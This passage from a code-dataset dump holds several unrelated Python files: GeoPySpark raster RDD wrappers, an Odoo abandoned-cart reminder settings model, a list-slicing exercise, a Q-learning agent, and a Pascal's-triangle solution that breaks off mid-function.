(JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n \"\"\"\n\n __slots__ = ['geopysc', 'rdd_type', 'srdd']\n\n def __init__(self, geopysc, rdd_type, srdd):\n self.geopysc = geopysc\n self.rdd_type = rdd_type\n self.srdd = srdd\n\n @classmethod\n def from_numpy_rdd(cls, geopysc, rdd_type, numpy_rdd):\n \"\"\"Create a RasterRDD from a numpy RDD.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. 
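Note on `_reclassify` above: any key of `value_map` that is not already a bare value of `data_type` is treated as an iterable of break points, each mapped to the shared replacement value — which is why a tuple key like `(1, 2, 3)` fans out into three entries. A pure-Python standalone sketch of that expansion step:

```python
# Standalone sketch of the key-expansion loop in _reclassify above.
def expand_value_map(value_map, data_type):
    new_dict = {}
    for key, value in value_map.items():
        if isinstance(key, data_type):
            new_dict[key] = value
        else:
            for k in key:                # e.g. a tuple of break points
                new_dict[k] = value
    return new_dict

assert expand_value_map({(1, 2, 3): 0, 4: 9}, int) == {1: 0, 2: 0, 3: 0, 4: 9}
```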
This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n numpy_rdd (RDD): A PySpark RDD that contains tuples of either ProjectedExtents or\n TemporalProjectedExtents and raster that is represented by a numpy array.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.RasterRDD`\n \"\"\"\n\n key = geopysc.map_key_input(rdd_type, False)\n\n schema = geopysc.create_schema(key)\n ser = geopysc.create_tuple_serializer(schema, key_type=None, value_type=TILE)\n reserialized_rdd = numpy_rdd._reserialize(ser)\n\n if rdd_type == SPATIAL:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.ProjectedRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema)\n else:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.TemporalRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema)\n\n return cls(geopysc, rdd_type, srdd)\n\n def to_numpy_rdd(self):\n \"\"\"Converts a RasterRDD to a numpy RDD.\n\n Note:\n Depending on the size of the data stored within the RDD, this can be an exspensive\n operation and should be used with caution.\n\n Returns:\n RDD\n \"\"\"\n\n result = self.srdd.toAvroRDD()\n ser = self.geopysc.create_tuple_serializer(result._2(), value_type=TILE)\n return self.geopysc.create_python_rdd(result._1(), ser)\n\n def collect_metadata(self, extent=None, layout=None, crs=None, tile_size=256):\n \"\"\"Iterate over RDD records and generates layer metadata desribing the contained rasters.\n\n Args:\n extent (:ref:`extent`, optional): Specify layout extent, must also specify layout.\n layout (:ref:`tile_layout`, optional): Specify tile layout, must also specify extent.\n crs (str, int, optional): Ignore CRS from records and use given one instead.\n tile_size (int, optional): Pixel dimensions of each tile, if not using layout.\n\n Note:\n `extent` and `layout` must both be defined if they are to be used.\n\n Returns:\n :ref:`metadata`\n\n Raises:\n TypeError: If either `extent` and `layout` is not defined but the other is.\n \"\"\"\n\n if not crs:\n crs = \"\"\n\n if extent and layout:\n json_metadata = self.srdd.collectMetadata(extent, layout, crs)\n elif not extent and not layout:\n json_metadata = self.srdd.collectMetadata(str(tile_size), crs)\n else:\n raise TypeError(\"Could not collect metadata with {} and {}\".format(extent, layout))\n\n return json.loads(json_metadata)\n\n def reproject(self, target_crs, resample_method=NEARESTNEIGHBOR):\n \"\"\"Reproject every individual raster to `target_crs`, does not sample past tile boundary\n\n Args:\n target_crs (int, str): The CRS to reproject to. Can either be the EPSG code,\n well-known name, or a PROJ.4 projection string.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then `NEARESTNEIGHBOR`\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.RasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n return RasterRDD(self.geopysc, self.rdd_type,\n self.srdd.reproject(target_crs, resample_method))\n\n def cut_tiles(self, layer_metadata, resample_method=NEARESTNEIGHBOR):\n \"\"\"Cut tiles to layout. May result in duplicate keys.\n\n Args:\n layer_metadata (:ref:`metadata`): The metadata of the ``RasterRDD`` instance.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. 
If none is specified, then `NEARESTNEIGHBOR`\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n srdd = self.srdd.cutTiles(json.dumps(layer_metadata), resample_method)\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def tile_to_layout(self, layer_metadata, resample_method=NEARESTNEIGHBOR):\n \"\"\"Cut tiles to layout and merge overlapping tiles. This will produce unique keys.\n\n Args:\n layer_metadata (:ref:`metadata`): The metadata of the ``RasterRDD`` instance.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then `NEARESTNEIGHBOR`\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n srdd = self.srdd.tileToLayout(json.dumps(layer_metadata), resample_method)\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def reclassify(self, value_map, data_type, boundary_strategy=LESSTHANOREQUALTO):\n \"\"\"Changes the cell values of a raster based on how the data is broken up.\n\n Args:\n value_map (dict): A ``dict`` whose keys represent values where a break should occur and\n its values are the new value the cells within the break should become.\n data_type (type): The type of the values within the rasters. Can either be ``int`` or\n ``float``.\n boundary_strategy (str, optional): How the cells should be classified along the breaks.\n If unspecified, then ``LESSTHANOREQUALTO`` will be used.\n\n NOTE:\n Simbolizing a NoData value differs depending on if the ``data_type`` is an ``int`` or a\n ``float``. For an ``int``, the constant ``NODATAINT`` can be used which represents the\n NoData value for ``int`` in GeoTrellis. If ``float``, then ``float('nan')`` is used to\n represent NoData.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.RasterRDD`\n \"\"\"\n\n srdd = _reclassify(self.srdd, value_map, data_type, boundary_strategy)\n return RasterRDD(self.geopysc, self.rdd_type, srdd)\n\n\nclass TiledRasterRDD(object):\n \"\"\"Holds a RDD of GeoTrellis rasters.\n\n Represents a RDD that contains (K, V). Where K is either SpatialKey or SpaceTimeKey depending\n on the `rdd_type` of the RDD, and V being a raster.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd (JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n\n Attributes:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd (JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n \"\"\"\n\n __slots__ = ['geopysc', 'rdd_type', 'srdd']\n\n def __init__(self, geopysc, rdd_type, srdd):\n self.geopysc = geopysc\n self.rdd_type = rdd_type\n self.srdd = srdd\n\n @property\n def layer_metadata(self):\n \"\"\"Layer metadata associated with this layer.\"\"\"\n return json.loads(self.srdd.layerMetadata())\n\n @property\n def zoom_level(self):\n \"\"\"The zoom level of the RDD. 
Can be `None`.\"\"\"\n return self.srdd.getZoom()\n\n @classmethod\n def from_numpy_rdd(cls, geopysc, rdd_type, numpy_rdd, metadata):\n \"\"\"Create a TiledRasterRDD from a numpy RDD.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n numpy_rdd (RDD): A PySpark RDD that contains tuples of either ProjectedExtents or\n TemporalProjectedExtents and raster that is represented by a numpy array.\n metadata (:ref:`metadata`): The metadata of the ``TiledRasterRDD`` instance.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n key = geopysc.map_key_input(rdd_type, True)\n\n schema = geopysc.create_schema(key)\n ser = geopysc.create_tuple_serializer(schema, key_type=None, value_type=TILE)\n reserialized_rdd = numpy_rdd._reserialize(ser)\n\n if rdd_type == SPATIAL:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.SpatialTiledRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema, json.dumps(metadata))\n else:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.TemporalTiledRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema, json.dumps(metadata))\n\n return cls(geopysc, rdd_type, srdd)\n\n @classmethod\n def rasterize(cls, geopysc, rdd_type, geometry, extent, crs, cols, rows,\n fill_value, instant=None):\n \"\"\"Creates a TiledRasterRDD from a shapely geomety.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n geometry (str, Polygon): The value to be turned into a raster. Can either be a\n string or a ``Polygon``. If the value is a string, it must be the WKT string,\n geometry format.\n extent (:ref:`extent`): The ``extent`` of the new raster.\n crs (str): The CRS the new raster should be in.\n cols (int): The number of cols the new raster should have.\n rows (int): The number of rows the new raster should have.\n fill_value (int): The value to fill the raster with.\n\n Note:\n Only the area the raster intersects with the ``extent`` will have this value.\n Any other area will be filled with GeoTrellis' NoData value for ``int`` which\n is represented in GeoPySpark as the constant, ``NODATAINT``.\n instant(int, optional): Optional if the data has no time component (ie is ``SPATIAL``).\n Otherwise, it is requires and represents the time stamp of the data.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n\n Raises:\n TypeError: If ``geometry`` is not a ``str`` or a ``Polygon``; or if there was a\n mistach in inputs. Mainly, setting the ``rdd_type`` as ``SPATIAL`` but also setting\n ``instant``.\n \"\"\"\n\n if not isinstance(geometry, str):\n try:\n geometry = dumps(geometry)\n except:\n raise TypeError(geometry, \"Needs to be either a Shapely Geometry or a string\")\n\n if instant and rdd_type != SPATIAL:\n srdd = geopysc._jvm.geopyspark.geotrellis.TemporalTiledRasterRDD.rasterize(\n geopysc.sc, geometry, extent, crs, instant, cols, rows, fill_value)\n elif not instant and rdd_type == SPATIAL:\n srdd = geopysc._jvm.geopyspark.geotrellis.SpatialTiledRasterRDD.rasterize(\n geopysc.sc, geometry, extent, crs, cols, rows, fill_value)\n else:\n raise TypeError(\"Abiguous inputs. 
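Note on `rasterize()` above: non-string geometries are normalised through `shapely.wkt.dumps`, so a shapely `Polygon` and its WKT string are interchangeable inputs. A standalone check of that round-trip (requires only shapely, not a Spark context):

```python
# Standalone sketch of the geometry-normalisation step in rasterize() above.
from shapely.geometry import Polygon
from shapely.wkt import dumps, loads

poly = Polygon([(0, 0), (0, 10), (10, 10), (10, 0)])
wkt = dumps(poly)
assert wkt.startswith("POLYGON")
assert loads(wkt).equals(poly)          # round-trips to the same shape
```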
Given \", instant, \" but rdd_type is SPATIAL\")\n\n return cls(geopysc, rdd_type, srdd)\n\n def to_numpy_rdd(self):\n \"\"\"Converts a TiledRasterRDD to a numpy RDD.\n\n Note:\n Depending on the size of the data stored within the RDD, this can be an exspensive\n operation and should be used with caution.\n\n Returns:\n RDD\n \"\"\"\n result = self.srdd.toAvroRDD()\n ser = self.geopysc.create_tuple_serializer(result._2(), value_type=TILE)\n return self.geopysc.create_python_rdd(result._1(), ser)\n\n def reproject(self, target_crs, extent=None, layout=None, scheme=FLOAT, tile_size=256,\n resolution_threshold=0.1, resample_method=NEARESTNEIGHBOR):\n \"\"\"Reproject RDD as tiled raster layer, samples surrounding tiles.\n\n Args:\n target_crs (int, str): The CRS to reproject to. Can either be the EPSG code,\n well-known name, or a PROJ.4 projection string.\n extent (:ref:`extent`, optional): Specify layout extent, must also specify layout.\n layout (:ref:`tile_layout`, optional): Specify tile layout, must also specify extent.\n scheme (str, optional): Which LayoutScheme should be used. Represented by the\n constants: `FLOAT` and `ZOOM`. If not specified, then `FLOAT` is used.\n tile_size (int, optional): Pixel dimensions of each tile, if not using layout.\n resolution_threshold (double, optional): The percent difference between a cell size\n and a zoom level along with the resolution difference between the zoom level and\n the next one that is tolerated to snap to the lower-resolution zoom.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then NEARESTNEIGHBOR\n is used.\n\n Note:\n `extent` and `layout` must both be defined if they are to be used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n\n Raises:\n TypeError if either `extent` or `layout` is defined bu the other is not.\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n if extent and layout:\n srdd = self.srdd.reproject(extent, layout, target_crs, resample_method)\n elif not extent and not layout:\n srdd = self.srdd.reproject(scheme, tile_size, resolution_threshold,\n target_crs, resample_method)\n else:\n raise TypeError(\"Could not collect reproject RDD with {} and {}\".format(extent, layout))\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def tile_to_layout(self, layout, resample_method=NEARESTNEIGHBOR):\n \"\"\"Cut tiles to layout and merge overlapping tiles. This will produce unique keys.\n\n Args:\n layout (:ref:`tile_layout`): Specify the TileLayout to cut to.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then NEARESTNEIGHBOR\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n srdd = self.srdd.tileToLayout(layout, resample_method)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def pyramid(self, start_zoom, end_zoom, resample_method=NEARESTNEIGHBOR):\n \"\"\"Creates a pyramid of GeoTrellis layers where each layer reprsents a given zoom.\n\n Args:\n start_zoom (int): The zoom level where pyramiding should begin. Represents\n the level that is most zoomed in.\n end_zoom (int): The zoom level where pyramiding should end. 
Represents\n the level that is most zoomed out.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then NEARESTNEIGHBOR\n is used.\n\n Returns:\n Pyramided TiledRasterRDDs (list): A list of TiledRasterRDDs.\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n size = self.layer_metadata['layoutDefinition']['tileLayout']['tileRows']\n\n if (size & (size - 1)) != 0:\n raise ValueError(\"Tiles must have a col and row count that is a power of 2\")\n\n result = self.srdd.pyramid(start_zoom, end_zoom, resample_method)\n\n return [TiledRasterRDD(self.geopysc, self.rdd_type, srdd) for srdd in result]\n\n def focal(self, operation, neighborhood, param_1=None, param_2=None, param_3=None):\n \"\"\"Performs the given focal operation on the layers contained in the RDD.\n\n Args:\n operation (str): The focal operation such as SUM, ASPECT, SLOPE, etc.\n neighborhood (str): The type of neighborhood to use such as ANNULUS, SQUARE, etc.\n param_1 (int, optional): If using SLOPE, then this is the zFactor, else it is the first\n argument of the `neighborhood`.\n param_2 (int, optional): The second argument of the `neighborhood`.\n param_3 (int, optional): The third argument of the `neighborhood`.\n\n Note:\n Any `param` that is not set will default to 0.0.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if operation not in OPERATIONS:\n raise ValueError(operation, \" Is not a known operation.\")\n\n if param_1 is None:\n param_1 = 0.0\n if param_2 is None:\n param_2 = 0.0\n if param_3 is None:\n param_3 = 0.0\n\n srdd = self.srdd.focal(operation, neighborhood, param_1, param_2, param_3)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def stitch(self):\n \"\"\"Stitch all of the rasters within the RDD into one raster.\n\n Note:\n This can only be used on `SPATIAL` TiledRasterRDDs.\n\n Returns:\n :ref:`raster`\n \"\"\"\n\n if self.rdd_type != SPATIAL:\n raise ValueError(\"Only TiledRasterRDDs with a rdd_type of Spatial can use stitch()\")\n\n tup = self.srdd.stitch()\n ser = self.geopysc.create_value_serializer(tup._2(), TILE)\n return ser.loads(tup._1())[0]\n\n def cost_distance(self, geometries, max_distance):\n \"\"\"Performs cost distance of a TileLayer.\n\n Args:\n geometries (list): A list of shapely geometries to be used as a starting point.\n\n Note:\n All geometries must be in the same CRS as the TileLayer.\n max_distance (int): The maximum ocst that a path may reach before operation.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n wkts = [shapely.wkt.dumps(g) for g in geometries]\n srdd = self.srdd.costDistance(self.geopysc.sc, wkts, max_distance)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def reclassify(self, value_map, data_type, boundary_strategy=LESSTHANOREQUALTO):\n \"\"\"Changes the cell values of a raster based on how the data is broken up.\n\n Args:\n value_map (dict): A ``dict`` whose keys represent values where a break should occur and\n its values are the new value the cells within the break should become.\n data_type (type): The type of the values within the rasters. 
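Note on the guard in `pyramid()` above: `(size & (size - 1)) != 0` is the classic bit trick — for `size > 0`, `size & (size - 1)` clears the lowest set bit, and only powers of two have a single set bit, so the expression is 0 exactly for 1, 2, 4, 8, and so on. A standalone check:

```python
# Standalone sketch of the power-of-two test used by pyramid() above.
def is_power_of_two(size):
    return size > 0 and (size & (size - 1)) == 0

assert [n for n in range(1, 17) if is_power_of_two(n)] == [1, 2, 4, 8, 16]
```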
Can either be ``int`` or\n ``float``.\n boundary_strategy (str, optional): How the cells should be classified along the breaks.\n If unspecified, then ``LESSTHANOREQUALTO`` will be used.\n\n NOTE:\n Simbolizing a NoData value differs depending on if the ``data_type`` is an ``int`` or a\n ``float``. For an ``int``, the constant ``NODATAINT`` can be used which represents the\n NoData value for ``int`` in GeoTrellis. If ``float``, then ``float('nan')`` is used to\n represent NoData.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n srdd = _reclassify(self.srdd, value_map, data_type, boundary_strategy)\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def _process_operation(self, value, operation):\n if isinstance(value, int) or isinstance(value, float):\n srdd = operation(value)\n elif isinstance(value, TiledRasterRDD):\n if self.rdd_type != value.rdd_type:\n raise ValueError(\"Both TiledRasterRDDs need to have the same rdd_type\")\n\n if self.layer_metadata['layoutDefinition']['tileLayout'] != \\\n value.layer_metadata['layoutDefinition']['tileLayout']:\n raise ValueError(\"Both TiledRasterRDDs need to have the same layout\")\n\n srdd = operation(value.srdd)\n else:\n raise TypeError(\"Local operation cannot be performed with\", value)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def __add__(self, value):\n return self._process_operation(value, self.srdd.localAdd)\n\n def __radd__(self, value):\n return self._process_operation(value, self.srdd.localAdd)\n\n def __sub__(self, value):\n return self._process_operation(value, self.srdd.localSubtract)\n\n def __rsub__(self, value):\n return self._process_operation(value, self.srdd.reverseLocalSubtract)\n\n def __mul__(self, value):\n return self._process_operation(value, self.srdd.localMultiply)\n\n def __rmul__(self, value):\n return self._process_operation(value, self.srdd.localMultiply)\n\n def __truediv__(self, value):\n return self._process_operation(value, self.srdd.localDivide)\n\n def __rtruediv__(self, value):\n return self._process_operation(value, self.srdd.reverseLocalDivide)\n","sub_path":"geopyspark/geotrellis/rdd.py","file_name":"rdd.py","file_ext":"py","file_size_in_byte":25041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475471822","text":"from odoo import api, fields, models, _\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\nclass res_config_settings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n\n allow_abandoneded_recovery = fields.Boolean(string=\"Allow Abandoned Recovery Mail\",related='website_id.allow_abandoneded_recovery')\n # group_abandonded_mail_reminder = fields.Boolean(\"Manage Group Acivation\",\n # implied_group='abandoned_cart_reminder_ept.group_abandonded_mail_reminder')\n reminder_update_policy = fields.Selection([\n ('global_update', 'All Schedule Update'),\n ('single_update', 'Individual schedule update'),\n ], string='Reminder Schedule Update Policy',default='global_update',related='website_id.reminder_update_policy',\n help=\"Select one policy for update reminder schedule. Here, 'All Schedule Update' for Global Updation. 
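Note on the operator overloads above: `_process_operation` dispatches scalars straight to the local map-algebra call, while RDD-with-RDD operands must first agree on `rdd_type` and tile layout. A pure-Python standalone mimic of that dispatch (the `Tile` class here is a stand-in invented for illustration, not part of GeoPySpark):

```python
# Standalone mimic of the dispatch in _process_operation above: scalars apply
# directly, peers must share a layout, anything else is a TypeError.
class Tile:
    def __init__(self, layout, data):
        self.layout, self.data = layout, data
    def _dispatch(self, other, op):
        if isinstance(other, (int, float)):
            return Tile(self.layout, [op(v, other) for v in self.data])
        if isinstance(other, Tile):
            if self.layout != other.layout:
                raise ValueError("Both operands need the same layout")
            return Tile(self.layout,
                        [op(a, b) for a, b in zip(self.data, other.data)])
        raise TypeError("Local operation cannot be performed with", other)
    def __add__(self, other):
        return self._dispatch(other, lambda a, b: a + b)
    __radd__ = __add__

t = Tile("256x256", [1, 2, 3])
assert (t + 1).data == [2, 3, 4]
assert (1 + t).data == [2, 3, 4]                    # __radd__ path
assert (t + Tile("256x256", [10, 10, 10])).data == [11, 12, 13]
```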
Which update all records of Abandoned Recovery Mail based on Mail Reminder Configuration.\"\n \"And 'Individual Schedule Update' is updated based on that selected particular mail reminder and you can see this update button in Mail Reminder Schedule.\")\n\n\n\n # # This method is used to implement Group on Menus\n # @api.onchange('allow_abandoneded_recovery')\n # def _onchange_allow_abandoneded_recovery_reminder(self):\n # if self.allow_abandoneded_recovery == True:\n # self.group_abandonded_mail_reminder = True\n # else:\n # self.group_abandonded_mail_reminder = False\n\n def update_records_abanodend_mail(self):\n if self.reminder_update_policy == 'global_update':\n websites = self.env['website'].search([('allow_abandoneded_recovery','=',True)])\n abd_records = self.env['abandoned.recovery.mail'].sudo().search([\n ('is_email_sent', '=', False), ('cancel', '=', False)])\n if abd_records:\n abd_records.unlink()\n\n RecoveryMail = self.env['abandoned.recovery.mail']\n curr_time = datetime.today().strftime('%Y-%m-%d %H:%M:%S')\n if websites:\n for website in websites:\n MailReminder = self.env['mail.reminder'].sudo().search(\n [('is_active', '=', True), ('website_id', '=', website.id)])\n\n if MailReminder:\n orders = self.env['sale.order'].sudo().search([('state', '=', 'draft'),\n ('partner_id.id', '!=', self.env.ref('base.public_partner').id),\n ('team_id.team_type', '=', 'website'),('order_line', '!=', False),\n ('website_id','=',website.id)])\n\n if orders:\n for order in orders:\n for reminder in MailReminder:\n schedule_hour = reminder.hours\n schedule_time = fields.Datetime.to_string(order.date_order + relativedelta(hours=schedule_hour))\n\n\n if schedule_time > curr_time:\n vals = {\n 'order_id': order.id,\n 'website_id': website.id,\n 'reminder_id': reminder.id,\n 'is_email_sent': False,\n 'schedule_time': schedule_time,\n 'is_active': True\n }\n RecoveryMail.sudo().create(vals)","sub_path":"abandoned_cart_reminder_ept/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"63656592","text":"import sys\nsys.path.append('../implementations/')\n\nfrom implementations.foods import foods\n\nprint('List of foods: {}'.format(foods))\n\nmy_foods = foods[:-2]\nfriend_foods = foods[0:2]\n\nprint('My food: {}'.format(my_foods))\nprint('My friend foods: {}'.format(friend_foods))","sub_path":"content_d_using_lists/ex29_copying_list.py","file_name":"ex29_copying_list.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"35694360","text":"from Action import Action\nfrom Gridworld import GridWorld\n\nimport numpy as np\n\nclass Agent:\n\n def __init__(self, state_dims, num_actions, lr=1e-2, epsilon=0, gamma=1, decay_lr = 0.99, decay_epsilon=0.75, supervisor=False):\n # state_dims is a list of dim sizes for each dim of\n # the state\n self.num_indices = len(state_dims)\n self.dim_sizes = state_dims\n # useful for index calculation\n self.cum_mult = np.array([np.prod(state_dims[i+1:]) for i in range(self.num_indices)])\n\n total_state_dim = np.prod(state_dims)\n # self.Qtable = np.random.rand(total_state_dim, num_actions)\n self.Qtable = np.zeros((total_state_dim, num_actions))\n\n self.num_actions = num_actions\n self.lr = lr\n if epsilon == 0:\n self.epsilon = 0.5 / (num_actions - 1) #50% chance of picking best action\n else:\n self.epsilon = 
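Note on the Odoo record above: `schedule_time > curr_time` compares two datetime *strings*, which is sound only because both sides use the same fixed-width, zero-padded `'%Y-%m-%d %H:%M:%S'` format, making lexicographic order coincide with chronological order. A standalone check of that property:

```python
# Standalone sketch: zero-padded ISO-like timestamp strings sort the same way
# the underlying datetimes do, which is what the comparison above relies on.
from datetime import datetime, timedelta

fmt = '%Y-%m-%d %H:%M:%S'
now = datetime(2021, 6, 1, 12, 0, 0)
later = now + timedelta(hours=3)
assert later.strftime(fmt) > now.strftime(fmt)
assert (later > now) == (later.strftime(fmt) > now.strftime(fmt))
```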
epsilon\n self.gamma = gamma\n self.decay_lr = decay_lr\n self.decay_epsilon = decay_epsilon\n\n self.supervisor = supervisor\n self.neginf = -100000\n return\n\n def _state_index(self, s):\n return int(np.sum(np.array(s) * self.cum_mult))\n\n # helper function to access Q table values\n def Q(self, s, a):\n a_int = int(a)\n s_index = self._state_index(s)\n return self.Qtable[s_index, a_int]\n\n # helper function to obtain best action and its Q value\n def Qmax(self,s):\n s_index = self._state_index(s)\n view = self.Qtable[s_index]\n action = np.argmax(view)\n return action, view[action]\n\n # greedy policy\n def Pi(self, s, env):\n prob_wts = [self.epsilon] * self.num_actions\n best_action, _ = self.Qmax(s)\n prob_wts[best_action] = 1 - (self.epsilon * (self.num_actions - 1))\n\n if self.supervisor:\n # Supervisor control\n s_index = self._state_index(s)\n legal, total_illegal_prob = [True]*self.num_actions, 0\n for action in range(self.num_actions):\n check_illegal = env.step(action, commit=False)\n if check_illegal:\n legal[action] = False\n total_illegal_prob += prob_wts[action]\n prob_wts[action] = 0\n self.Qtable[s_index, int(action)] = self.neginf\n\n num_legal = np.sum(legal)\n if num_legal == 0:\n # if all actions are illegal, then let the env give a huge\n # negative reward and end the trajectory\n # Any arbitrary action can be given\n return 0\n\n # redistribute probability weights\n increment = total_illegal_prob / num_legal\n for action in range(self.num_actions):\n if legal[action]:\n prob_wts[action] += increment\n\n return Action(np.random.choice(self.num_actions, p=prob_wts))\n\n # Q learning algorithm update rule\n def update(self, s, a, reward, sprime, done):\n # done - bool\n done = int(done)\n s_index = self._state_index(s)\n sprime_index = self._state_index(sprime)\n a_int = int(a)\n delta = reward + (1-done) * (self.gamma * self.Qmax(sprime)[1] - self.Q(s,a))\n self.Qtable[s_index, a_int] += self.lr * delta\n return\n\n def decay(self):\n self.epsilon = self.decay_epsilon * self.epsilon\n self.lr = self.decay_lr * self.lr\n return\n","sub_path":"src/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"306136669","text":"\"\"\"\n Given an integer rowIndex, return the rowIndexth row of the Pascal's triangle.\n Notice that the row index starts from 0.\n Could you optimize your algorithm to use only O(k) extra space?\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n # recursive solution\n if rowIndex == 0:\n return [1]\n lastRow = self.getRow(rowIndex - 1)\n res = [1]\n for i in range(len(lastRow) - 1):\n res.append(lastRow[i] + lastRow[i + 1])\n res.append(1)\n return res\n\n def getRow2(self, rowIndex: int) -> List[int]:\n \n mydict = { 0:[1], 1:[1,1] }\n if rowIndex in mydict:\n return mydict[rowIndex]\n \n def addToDict(n):\n if n in mydict:\n return\n else:\n tmp=[]\n tmp.append(1)\n i=0\n previous = mydict[n-1]\n while i+1 < n-1:\n tmp.append( previous[i]+previous[i+1] )\n i += 1\n tmp.append(1)\n #print('tmp=', tmp)\n mydict[n] = tmp\n return\n\n for i in range(1, rowIndex+2):\n addToDict(i)\n #print('checking mydict = ', mydict)\n \n \n return 
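A hedged note on `update()` in the Q-learning agent above: the `(1 - done)` factor multiplies the *whole* bracket, so on terminal transitions `delta` collapses to the raw reward and the stored `Q(s, a)` is never subtracted — the entry drifts by `lr * reward` on every terminal visit instead of converging toward the reward. The usual tabular target gates only the bootstrap term:

```python
# Standalone sketch of the standard TD error, with (1 - done) gating only the
# bootstrap term rather than the whole bracket as in the record above.
def td_delta(reward, q_sa, q_next_max, gamma, done):
    target = reward + (0 if done else gamma * q_next_max)
    return target - q_sa                 # Q(s,a) <- Q(s,a) + lr * delta

assert td_delta(1.0, q_sa=0.4, q_next_max=0.9, gamma=0.9, done=True) == 0.6
assert abs(td_delta(1.0, 0.4, 0.9, 0.9, False) - 1.41) < 1e-9
```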
